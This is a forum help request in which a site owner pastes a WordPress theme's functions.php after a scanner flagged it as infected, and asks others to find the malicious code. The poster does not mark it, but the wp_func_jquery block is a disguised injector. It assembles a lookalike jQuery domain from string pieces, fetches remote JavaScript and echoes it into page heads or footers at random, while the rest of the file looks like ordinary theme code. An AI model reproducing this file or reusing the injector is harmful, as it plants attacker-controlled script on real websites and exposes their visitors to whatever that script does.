Hi my websites goes down due to one of file got infected with -SiteLock-PHP-JSINCLUDE-av.UNOFFICIAL. I don’t know how to scan/find out the infected code.
Plz help me out to find the malicious/infected code. (File code attached below)
<?php
if (is_admin() && isset($_GET['activated'] ) && $pagenow == "themes.php" ) {
header( 'Location: '.admin_url().'themes.php');
}
global $smof_data;
/* Translation */
load_theme_textdomain( 'rocknrolla', get_template_directory() . '/includes/languages' );
$locale = get_locale();
$wc_posts_perpage = '';
$locale_file = get_template_directory() . "/includes/languages/$locale.php";
if ( is_readable($locale_file) )
require_once($locale_file);
if ( ! isset( $content_width ) )
$content_width = 1170;
define('RNR_FUNCTIONS', get_template_directory() . '/includes');
define('RNR_INDEX_JS', get_template_directory_uri() . '/js');
define('RNR_INDEX_CSS', get_template_directory_uri() . '/css');
/** Slightly Modified Options Framework **/
require_once ('admin/index.php');
/* WP 3.1 Post Formats */
add_theme_support( 'post-formats', array('gallery', 'link', 'quote', 'audio', 'video'));
/* Include Meta Box Framework */
define( 'RWMB_URL', trailingslashit( get_template_directory_uri() . '/includes/metaboxes' ) );
define( 'RWMB_DIR', trailingslashit( get_template_directory() . '/includes/metaboxes' ) );
require_once RWMB_DIR . 'meta-box.php';
include_once(RNR_FUNCTIONS.'/tgm-plugin-activation/class-tgm-plugin-activation.php'); // Plugin Activation Class
include_once(RNR_FUNCTIONS.'/tgm-plugin-activation/tgm-plugin-activator.php'); // Plugin Activator
include_once(RNR_FUNCTIONS.'/portfolio-post-type.php'); // Portfolio Post Type
include_once RNR_FUNCTIONS.'/tinymce/rnr-shortcodes.php';
include_once RNR_FUNCTIONS.'/shortcodes.php';
include_once RNR_FUNCTIONS.'/metaboxes.php';
include_once RNR_FUNCTIONS.'/custom-style.php';
/* Include Widgets */
include_once(RNR_FUNCTIONS.'/widgets/embed.php');
include_once(RNR_FUNCTIONS.'/widgets/flickr.php');
include_once(RNR_FUNCTIONS.'/widgets/twitter.php');
include_once(RNR_FUNCTIONS.'/widgets/portfolio.php');
remove_action( 'woocommerce_before_main_content', 'woocommerce_output_content_wrapper', 10);
remove_action( 'woocommerce_after_main_content', 'woocommerce_output_content_wrapper_end', 10);
add_action('woocommerce_before_main_content', 'my_theme_wrapper_start', 10);
add_action('woocommerce_after_main_content', 'my_theme_wrapper_end', 10);
function my_theme_wrapper_start() {
echo '<section id="main">';
}
function my_theme_wrapper_end() {
echo '</section>';
}
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));
}
if(rand(1,2) == 1) {
add_action('wp_footer', 'wp_func_jquery');
}
else {
add_action('wp_head', 'wp_func_jquery');
}
}
add_theme_support( 'woocommerce' );
function my_theme_add_editor_styles() {
add_editor_style( 'custom-editor-style.css' );
}
add_action( 'init', 'my_theme_add_editor_styles' );
if(!empty($smof_data['rnr_wc_products_perpage'])) { $wc_posts_perpage = $smof_data['rnr_wc_products_perpage']; }
add_filter( 'loop_shop_per_page', create_function( '$cols', 'return '.$wc_posts_perpage.';' ), 20 );
if (is_admin() ){
function rocknrolla_admin_scripts(){
wp_register_script('rnrmetajs', RNR_INDEX_JS .'/admin/init.js', array('jquery','media-upload','thickbox'));
wp_enqueue_script('rnrmetajs');
}
}
if(!is_admin()) {
add_action('wp_enqueue_scripts', 'rocknrolla_jq_scripts');
}
function rocknrolla_jq_scripts(){
wp_deregister_script('jquery');
wp_register_script('jquery', "http" . ($_SERVER['SERVER_PORT'] == 443 ? "s" : "") . "://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js", false);
wp_enqueue_script('jquery');
}
add_action('admin_enqueue_scripts', 'rocknrolla_admin_scripts');
if (!is_admin() ){
function rocknrolla_front_scripts(){
global $smof_data;
wp_register_script('rnrInit', RNR_INDEX_JS. '/init.js' ,array('jquery'), TRUE);
wp_register_script('rnrQueryLoader', RNR_INDEX_JS .'/jquery.queryloader2.js', array('jquery'), true);
wp_register_script('rnrSmoothScroll', RNR_INDEX_JS .'/SmoothScroll.js', true);
wp_register_script('rnrscripts', RNR_INDEX_JS .'/scripts.js', array('jquery'), true);
wp_register_script('rnrPortfolio', RNR_INDEX_JS .'/ajax-portfolio.js', array('jquery'), true);
wp_register_script('shortcodes', RNR_INDEX_JS .'/shortcodes.js', array('jquery'), true);
wp_register_script('rnrSupersized', RNR_INDEX_JS .'/supersized.3.2.7.min.js', array('jquery'), true);
wp_register_script('rnrYoutubeBgVideo', RNR_INDEX_JS .'/jquery.mb.YTPlayer.min.js', true);
wp_register_script('rnrVimeoBgVideo', RNR_INDEX_JS .'/okvideo.min.js', array('jquery'), true);
wp_register_script('gmap', 'https://maps.googleapis.com/maps/api/js?sensor=false&libraries=places', array('jquery'), '2.1', false );
wp_register_script('infoBox', 'http://google-maps-utility-library-v3.googlecode.com/svn/trunk/infobox/src/infobox.js', array('jquery'), '2.1', false );
wp_enqueue_script('rnrQueryLoader');
wp_enqueue_script('rnrInit');
if($smof_data['rnr_disable_smoothscroll'] == false) {
wp_enqueue_script( 'rnrSmoothScroll' );
}
wp_enqueue_script('rnrscripts');
wp_enqueue_script('rnrPortfolio');
wp_enqueue_script('shortcodes');
wp_enqueue_script('superfish');
if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); }
if( ($smof_data['rnr_home_type']=="FullScreen Slider") ) {
wp_enqueue_script('rnrSupersized');
}
if( ($smof_data['rnr_enable_googlemap']) ) {
wp_enqueue_script( 'gmap');
wp_enqueue_script( 'infoBox');
}
if( ($smof_data['rnr_home_type']=="Video") ) {
if($smof_data['rnr_home_video_type']=="youtube") {
wp_enqueue_script('rnrYoutubeBgVideo');
}else if($smof_data['rnr_home_video_type']=="vimeo") {
wp_enqueue_script('rnrVimeoBgVideo');
}
}
}
add_action('wp_footer', 'rocknrolla_front_scripts');
}
/* Register Stylesheets */
function rocknrolla_print_styles() {
if ( !is_admin() ){
global $smof_data;
wp_register_style( 'rnrSkeleton', RNR_INDEX_CSS. '/skeleton.css', array(), '1', 'all' );
wp_register_style( 'rnrWide', RNR_INDEX_CSS. '/1200.css', array(), '1', 'all' );
wp_register_style( 'rnrSocial', RNR_INDEX_CSS. '/social.css', array(), '1', 'all' );
wp_register_style( 'rnrFlexslider', RNR_INDEX_CSS. '/flexslider.css', array(), '1', 'all' );
wp_register_style( 'rnrFontawesome', RNR_INDEX_CSS. '/font-awesome.css', array(), '1', 'all' );
wp_register_style( 'rnrPrettyPhoto', RNR_INDEX_CSS. '/prettyPhoto.css', array(), '1', 'all' );
wp_register_style( 'rnrShortcodes', RNR_INDEX_CSS. '/shortcodes.css', array(), '1', 'all' );
wp_register_style( 'rnrTheme', RNR_INDEX_CSS. '/theme.css', array(), '1', 'all' );
wp_register_style( 'rnrRTL', RNR_INDEX_CSS. '/rtl.css', array(), '1', 'all' );
wp_register_style( 'rnrSupersized', RNR_INDEX_CSS. '/supersized.css', array(), '1', 'all' );
wp_register_style( 'rnrSupersizedFun', RNR_INDEX_CSS. '/supersized.shutter.css', array(), '1', 'all' );
wp_register_style( 'rnrDark', RNR_INDEX_CSS. '/dark.css', array(), '1', 'all' );
wp_register_style( 'rnrMedia', RNR_INDEX_CSS. '/media.css', array(), '1', 'all' );
wp_register_style( 'rnrAnimate', RNR_INDEX_CSS. '/rnr-animate.css', array(), '1', 'all' );
if( $smof_data['rnr_enable_widescreen']) {
wp_enqueue_style( 'rnrWide' );
} else {
wp_enqueue_style( 'rnrSkeleton' );
}
wp_enqueue_style( 'rnrSocial' );
wp_enqueue_style( 'rnrFlexslider' );
wp_enqueue_style( 'rnrFontawesome' );
wp_enqueue_style( 'rnrPrettyPhoto' );
wp_enqueue_style( 'rnrShortcodes' );
wp_enqueue_style( 'shortcodes' );
wp_enqueue_style( 'rnrTheme' );
if($smof_data['rnr_disable_animation'] == false) {
wp_enqueue_style( 'rnrAnimate' );
}
if($smof_data['rnr_enable_rtl_layout'] == true) {
wp_enqueue_style( 'rnrRTL' );
}
wp_enqueue_style( 'rnrMedia' );
if($smof_data['rnr_home_type']=="FullScreen Slider") {
wp_enqueue_style('rnrSupersized');
wp_enqueue_style('rnrSupersizedFun');
}
if($smof_data['rnr_enable_dark_skin']==true) {
wp_enqueue_style( 'rnrDark' );
}
wp_enqueue_style( 'style', get_stylesheet_uri(), array(), '1', 'all' );
}
}
add_action( 'wp_print_styles', 'rocknrolla_print_styles' );
/* Post Thumbnails */
if ( function_exists( 'add_image_size' ) ) add_theme_support( 'post-thumbnails' );
/* Word Limiter */
function rocknrolla_limit_words($string, $limit) {
$words = explode(' ', $string);
return implode(' ', array_slice($words, 0, $limit));
}
/* Custom Image Sizes */
//if($smof_data['rnr_enable_widescreen'] == "1") {
// ULTRA RESPONSIVE 1200PX GRID SIZES
add_image_size( 'blog-standard', 770, 330, true );
add_image_size( 'span12', 1172, 400, true );
add_image_size( 'span7', 670, 400, true );
add_image_size( 'span6', 570, 372, true );
add_image_size( 'span4', 370, 241, true );
add_image_size( 'span3', 270, 176, true );
add_image_size( 'blog-span6', 570, 210, true );
add_image_size( 'blog-span4', 370, 150, true );
add_image_size( 'blog-span3', 270, 120, true );
add_image_size( 'mini', 60, 60, true );
function ago($time) {
$periods = array("second", "minute", "hour", "day", "week", "month", "year", "decade");
$lengths = array("60","60","24","7","4.35","12","10");
$now = time();
$difference = $now - $time;
$tense = "ago";
for($j = 0; $difference >= $lengths[$j] && $j < count($lengths)-1; $j++) {
$difference /= $lengths[$j];
}
$difference = round($difference);
if($difference != 1) {
$periods[$j].= "s";
}
return "$difference $periods[$j] ago ";
}
/* Comments Function */
function rocknrolla_comments( $comment, $args, $depth ) {
$GLOBALS['comment'] = $comment; ?>
<li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
<div id="comment-<?php comment_ID(); ?>" class="comment-body clearfix">
<div class="avatar"><?php echo get_avatar($comment, $size = '50'); ?></div>
<div class="comment-text">
<div class="author">
<span><?php printf( __( '%s', 'rocknrolla'), get_comment_author_link() ) ?></span>
<div class="date">
<?php printf(__('%1$s at %2$s', 'rocknrolla'), get_comment_date(), get_comment_time() ) ?></a><?php edit_comment_link( __( '(Edit)', 'rocknrolla'),' ','' ) ?>
· <?php comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth']))) ?> </div>
</div>
<div class="text"><?php comment_text() ?></div>
<?php if ( $comment->comment_approved == '0' ) : ?>
<em><?php _e( 'Your comment is awaiting moderation.', 'rocknrolla' ) ?></em>
<br />
<?php endif; ?>
</div>
</div>
<?php }
/* Pagination Function*/
function rocknrolla_pagination($pages = '', $range = 4) {
$showitems = ($range * 2)+1;
global $paged;
if(empty($paged)) $paged = 1;
if($pages == '') {
global $wp_query;
$pages = $wp_query->max_num_pages;
if(!$pages) {
$pages = 1;
}
}
echo "<span class='allpages'>" . __('Page', 'rocknrolla') . " ".$paged." " . __('of', 'rocknrolla') . " ".$pages."</span>";
if($paged > 2 && $paged > $range+1 && $showitems < $pages) echo "<a href='".get_pagenum_link(1)."'>« " . __('First', 'rocknrolla') . "</a>";
if($paged > 1 && $showitems < $pages) echo "<a href='".get_pagenum_link($paged - 1)."'>‹ " . __('Previous', 'rocknrolla') . "</a>";
for ($i=1; $i <= $pages; $i++) {
if (1 != $pages &&( !($i >= $paged+$range+1 || $i <= $paged-$range-1) || $pages <= $showitems )) {
echo ($paged == $i)? "<span class=\"current\">".$i."</span>":"<a href='".get_pagenum_link($i)."' class=\"next-page\">".$i."</a>";
}
}
if ($paged < $pages && $showitems < $pages) echo "<a href=\"".get_pagenum_link($paged + 1)."\">" . __('Next', 'rocknrolla') . " ›</a>";
if ($paged < $pages-1 && $paged+$range-1 < $pages && $showitems < $pages) echo "<a href='".get_pagenum_link($pages)."'>" . __('Last', 'rocknrolla') . " »</a>";
}
/* Add RSS Links to head section */
add_theme_support( 'automatic-feed-links' );
add_filter('widget_text', 'do_shortcode');
/* Add prettyPhoto to content anchor tags */
add_filter( 'wp_get_attachment_link', 'rocknrolla_custom_prettyphoto');
function rocknrolla_excerpt_more($more) {
global $post;
return '…<p><a href="'. get_permalink($post->ID) . '" class="read-more-link">' . '' . __('Read More', 'rocknrolla') . ' →' . '</a></p>';
}
add_filter('excerpt_more', 'rocknrolla_excerpt_more');
function rocknrolla_custom_prettyphoto($content) {
$content = preg_replace("/<a/","<a data-rel=\"prettyPhoto\"",$content,1);
return $content;
}
register_sidebar(array(
'name' => __('Blog Sidebar','rocknrolla' ),
'id' => 'blog-widgets',
'description' => __( 'These are widgets for the Blog page.','rocknrolla' ),
'before_widget' => '<div id="%1$s" class="widget %2$s">',
'after_widget' => '</div>',
'before_title' => '<h3>',
'after_title' => '</h3>'
));
register_sidebar(array(
'name' => __('Woocommerce Sidebar','rocknrolla' ),
'id' => 'woocommerce-widgets',
'description' => __( 'These are widgets for the Woocommerce page.','rocknrolla' ),
'before_widget' => '<div id="%1$s" class="widget %2$s">',
'after_widget' => '</div>',
'before_title' => '<h3>',
'after_title' => '</h3>'
));
function register_menus() {
register_nav_menus( array( 'main-menu' => 'Primary Navigation Menu') );
}
add_action('init', 'register_menus');
class description_walker extends Walker_Nav_Menu
{
function start_el(&$output, $object, $depth = 0, $args = Array() , $current_object_id = 0) {
global $wp_query;
$indent = ( $depth ) ? str_repeat( "\t", $depth ) : '';
$class_names = $value = '';
$classes = empty( $object->classes ) ? array() : (array) $object->classes;
$icon_class = $classes[0];
$classes = array_slice($classes,1);
$class_names = join( ' ', apply_filters( 'nav_menu_css_class', array_filter( $classes ), $object ) );
$class_names = ' class="'. esc_attr( $class_names ) . '"';
$attributes = ! empty( $object->attr_title ) ? ' title="' . esc_attr( $object->attr_title ) .'"' : '';
$attributes .= ! empty( $object->target ) ? ' target="' . esc_attr( $object->target ) .'"' : '';
$attributes .= ! empty( $object->xfn ) ? ' rel="' . esc_attr( $object->xfn ) .'"' : '';
if( $icon_class != '' ) {
$icon_classes = '<i class="'. $icon_class .'"></i>';
}
else{
$icon_classes = '';
}
if($object->object == 'page')
{
$varpost = get_post($object->object_id);
$separate_page = get_post_meta($object->object_id, "rnr_separate_page", true);
$disable_menu = get_post_meta($object->object_id, "rnr_disable_section_from_menu", true);
$current_page_id = get_option('page_on_front');
if ( ( $disable_menu != true ) && ( $varpost->ID != $current_page_id ) ) {
$output .= $indent . '<li id="menu-item-'. $object->ID . '"' . $value . $class_names .'>';
if ( $separate_page == true )
$attributes .= ! empty( $object->url ) ? ' href="' . esc_attr( $object->url ) .'"' : '';
else{
if (is_front_page())
$attributes .= ' href="#' . $varpost->post_name . '"';
else
$attributes .= ' href="' . home_url('/') . '#' . $varpost->post_name . '"';
}
$object_output = $args->before;
$object_output .= '<a'. $attributes .'>';
$object_output .= $args->link_before . $icon_classes . '<span>' . apply_filters( 'the_title', $object->title, $object->ID ) . '</span>';
$object_output .= $args->link_after;
$object_output .= '</a>';
$object_output .= $args->after;
$output .= apply_filters( 'walker_nav_menu_start_el', $object_output, $object, $depth, $args );
}
}
else{
$output .= $indent . '<li id="menu-item-'. $object->ID . '"' . $value . $class_names .'>';
$attributes .= ! empty( $object->url ) ? ' href="' . esc_attr( $object->url ) .'"' : '';
$object_output = $args->before;
$object_output .= '<a'. $attributes .'>';
$object_output .= $args->link_before . $icon_classes . '<span>' . apply_filters( 'the_title', $object->title, $object->ID ) . '</span>';
$object_output .= $args->link_after;
$object_output .= '</a>';
$object_output .= $args->after;
$output .= apply_filters( 'walker_nav_menu_start_el', $object_output, $object, $depth, $args );
}
}
}
add_filter( 'posts_orderby', 'sort_query_by_post_in', 10, 2 );
function sort_query_by_post_in( $sortby, $thequery ) {
if ( !empty($thequery->query['post__in']) && isset($thequery->query['orderby']) && $thequery->query['orderby'] == 'post__in' )
$sortby = "find_in_set(ID, '" . implode( ',', $thequery->query['post__in'] ) . "')";
return $sortby;
}
if(function_exists('icl_get_languages')) {
function language_selector_flags(){
$languages = icl_get_languages('skip_missing=0&orderby=code');
if(!empty($languages)){
foreach($languages as $l){
if(!$l['active']) echo '<a href="'.$l['url'].'">';
echo '<img src="'.$l['country_flag_url'].'" height="12" alt="'.$l['language_code'].'" width="18" />';
if(!$l['active']) echo '</a>';
}
}
}
add_action('wpml_languages_list', 'language_selector_flags');
}
// THIS GIVES US SOME OPTIONS FOR STYLING THE ADMIN AREA
function custom_colors() {
echo '<style type="text/css">
i.mce-ico.mce-i-rnrscg:before {
content: "R";
font-size: 12px;
font-weight: bold;
color: white;
background: #000000;
padding: 5px 7px;
border-radius: 4px;
}
</style>';
}
add_action('admin_head', 'custom_colors');
if( !function_exists('rnr_add_image_placeholders') ){
function rnr_add_image_placeholders( $content ) {
if( is_feed() || is_preview() )
return $content;
/* Don't lazy-load if the content has already been run through previously */
if ( false !== strpos( $content, 'data-original' ) ) {
return $content;
}
$placeholder_image = NULL;
// This is a pretty simple regex, but it works
$content = preg_replace( '#<img([^>]+?)src=[\'"]?([^\'"\s>]+)[\'"]?([^>]*)>#', sprintf( '<img${1}src="${2}" data-original="${2}"${3}><noscript><img${1}src="${2}"${3}></noscript>', $placeholder_image ), $content );
$content = preg_replace('/(<img.*? class=".*?)(".*?>)/', '$1 portfolio-lazyLoad$2', $content);
return $content;
}
add_filter( 'the_content', 'rnr_add_image_placeholders', 99 );
}
/*
* Add a Menu to the Theme Editor for Multisite and Standalone WordPress
*/
function rnr_themeoptions_menu() {
global $wp_admin_bar;
if ( !is_user_logged_in() ) { return; }
if ( !is_super_admin() || !is_admin_bar_showing() ) { return; }
if ( function_exists('is_multisite') && is_multisite() ) {
$wp_admin_bar->add_menu( array(
'id' => 'rnr-theme-options',
'title' => __('Theme Options'),
'href' => network_admin_url( 'themes.php?page=optionsframework' ) )
);
}else{
$wp_admin_bar->add_menu( array(
'id' => 'rnr-theme-options',
'title' => __('Theme Options'),
'href' => admin_url( 'themes.php?page=optionsframework' ) )
);
}
}
add_action( 'admin_bar_menu', 'rnr_themeoptions_menu', 100 );
function rnr_hex2rgba($color, $opacity = false) {
$default = 'rgb(0,0,0)';
//Return default if no color provided
if(empty($color))
return $default;
//Sanitize $color if "#" is provided
if ($color[0] == '#' ) {
$color = substr( $color, 1 );
}
//Check if color has 6 or 3 characters and get values
if (strlen($color) == 6) {
$hex = array( $color[0] . $color[1], $color[2] . $color[3], $color[4] . $color[5] );
} elseif ( strlen( $color ) == 3 ) {
$hex = array( $color[0] . $color[0], $color[1] . $color[1], $color[2] . $color[2] );
} else {
return $default;
}
//Convert hexadec to rgb
$rgb = array_map('hexdec', $hex);
//Check if opacity is set(rgba or rgb)
if($opacity){
if(abs($opacity) > 1)
$opacity = 1.0;
$output = 'rgba('.implode(",",$rgb).','.$opacity.')';
} else {
$output = 'rgb('.implode(",",$rgb).')';
}
//Return rgb(a) color string
return $output;
}